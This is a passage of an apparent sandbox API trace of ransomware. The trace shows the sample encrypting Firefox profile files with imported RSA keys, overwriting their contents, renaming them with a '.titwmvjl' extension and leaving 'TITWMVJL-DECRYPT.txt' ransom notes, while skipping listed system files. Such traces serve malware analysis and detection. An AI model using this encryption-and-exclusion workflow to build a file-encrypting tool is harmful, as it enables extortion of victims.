pbBuffer=0x259dd18) returned 1 [0084.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.923] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.923] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.923] CryptAcquireContextW (in: phProv=0x259dc60, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc60*=0x4c9980) returned 1 [0084.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.925] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259dc64 | out: phKey=0x259dc64*=0x5037b8) returned 1 [0084.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.925] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259dc58, pdwDataLen=0x259dc5c, dwFlags=0x0 | out: pbData=0x259dc58*=0x800, pdwDataLen=0x259dc5c*=0x4) returned 1 [0084.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.925] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259dc90*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259dc90*=0x100) returned 1 [0084.926] GetLastError () returned 0x0 [0084.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.926] CryptDestroyKey (hKey=0x5037b8) returned 1 [0084.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.926] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.926] CryptAcquireContextW (in: phProv=0x259dc60, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc60*=0x4c9980) returned 1 [0084.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.928] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259dc64 | out: phKey=0x259dc64*=0x5033b8) returned 1 [0084.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.928] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259dc58, pdwDataLen=0x259dc5c, dwFlags=0x0 | out: pbData=0x259dc58*=0x800, pdwDataLen=0x259dc5c*=0x4) returned 1 [0084.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.928] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259dc90*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259dc90*=0x100) returned 1 [0084.929] GetLastError () returned 0x0 [0084.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.929] CryptDestroyKey (hKey=0x5033b8) returned 1 [0084.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.929] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.929] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.930] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0084.930] ReadFile (in: hFile=0x2e8, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dd3c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dd3c*=0xc000, lpOverlapped=0x0) returned 1 [0084.964] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0xffff4000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.964] WriteFile (in: hFile=0x2e8, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc000, lpNumberOfBytesWritten=0x259dd20, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dd20*=0xc000, lpOverlapped=0x0) returned 1 [0084.977] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.977] WriteFile (in: hFile=0x2e8, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dd20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259dd20*=0x21c, lpOverlapped=0x0) returned 1 [0084.980] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.985] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.985] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.986] CloseHandle (hObject=0x2e8) returned 1 [0084.988] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0084.989] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.989] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.989] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.989] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock" [0084.989] lstrlenW (lpString=".titwmvjl") returned 9 [0084.989] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock") returned 146 [0084.989] VirtualAlloc (lpAddress=0x0, dwSize=0x164, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.990] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 155 [0084.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock") returned 146 [0084.990] lstrlenW (lpString=".lock") returned 5 [0084.990] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.990] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.990] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.990] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.991] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.991] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.991] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.991] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\TITWMVJL-DECRYPT.txt" [0084.991] lstrlenW (lpString=".titwmvjl") returned 9 [0084.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\TITWMVJL-DECRYPT.txt") returned 142 [0084.991] VirtualAlloc (lpAddress=0x0, dwSize=0x15c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.991] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 151 [0084.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\TITWMVJL-DECRYPT.txt") returned 142 [0084.991] lstrlenW (lpString=".txt") returned 4 [0084.991] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.991] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.992] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.992] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.992] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\TITWMVJL-DECRYPT.txt") returned 142 [0084.992] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\TITWMVJL-DECRYPT.txt") returned 142 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.992] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.992] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 0 [0084.992] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0084.994] CloseHandle (hObject=0x2e0) returned 1 [0084.994] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.994] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.994] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.994] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\TITWMVJL-DECRYPT.txt" [0084.994] lstrlenW (lpString=".titwmvjl") returned 9 [0084.994] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\TITWMVJL-DECRYPT.txt") returned 138 [0084.994] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.995] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 147 [0084.995] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\TITWMVJL-DECRYPT.txt") returned 138 [0084.995] lstrlenW (lpString=".txt") returned 4 [0084.995] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.995] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.995] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.995] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.996] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\TITWMVJL-DECRYPT.txt") returned 138 [0084.996] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\TITWMVJL-DECRYPT.txt") returned 138 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.996] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.996] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.996] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 0 [0084.996] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0084.997] CloseHandle (hObject=0x2dc) returned 1 [0084.997] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0084.997] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.997] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.997] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\TITWMVJL-DECRYPT.txt" [0084.997] lstrlenW (lpString=".titwmvjl") returned 9 [0084.997] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\TITWMVJL-DECRYPT.txt") returned 118 [0084.997] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.998] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 127 [0084.998] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\TITWMVJL-DECRYPT.txt") returned 118 [0084.998] lstrlenW (lpString=".txt") returned 4 [0084.998] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.998] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.998] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.998] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.998] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\TITWMVJL-DECRYPT.txt") returned 118 [0084.998] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\TITWMVJL-DECRYPT.txt") returned 118 [0084.998] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.998] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.998] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.998] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.998] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.998] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.998] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.999] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.999] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.999] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0084.999] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0085.000] CloseHandle (hObject=0x248) returned 1 [0085.000] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0085.000] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0085.000] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0085.001] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\TITWMVJL-DECRYPT.txt" [0085.001] lstrlenW (lpString=".titwmvjl") returned 9 [0085.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\TITWMVJL-DECRYPT.txt") returned 108 [0085.001] VirtualAlloc (lpAddress=0x0, dwSize=0x118, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.001] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 117 [0085.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\TITWMVJL-DECRYPT.txt") returned 108 [0085.001] lstrlenW (lpString=".txt") returned 4 [0085.001] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.001] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0085.002] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0085.002] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\TITWMVJL-DECRYPT.txt") returned 108 [0085.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\TITWMVJL-DECRYPT.txt") returned 108 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0085.002] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0085.002] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.002] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0085.002] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0085.004] CloseHandle (hObject=0x2d4) returned 1 [0085.005] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0085.005] lstrcmpW (lpString1="storage.sqlite", lpString2=".") returned 1 [0085.005] lstrcmpW (lpString1="storage.sqlite", lpString2="..") returned 1 [0085.005] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="storage.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite" [0085.005] lstrlenW (lpString=".titwmvjl") returned 9 [0085.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0085.005] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.005] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite.titwmvjl") returned 103 [0085.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0085.005] lstrlenW (lpString=".sqlite") returned 7 [0085.005] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.006] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0085.006] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0085.006] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0085.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="desktop.ini") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="autorun.inf") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="ntuser.dat") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="iconcache.db") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="bootsect.bak") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="boot.ini") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="ntuser.dat.log") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="thumbs.db") returned -1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="CRAB-DECRYPT.html") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="ntldr") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="NTDETECT.COM") returned 1 [0085.006] lstrcmpiW (lpString1="storage.sqlite", lpString2="Bootfont.bin") returned 1 [0085.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0085.007] lstrlenW (lpString=".sqlite") returned 7 [0085.007] VirtualAlloc (lpAddress=0x0, dwSize=0x12, 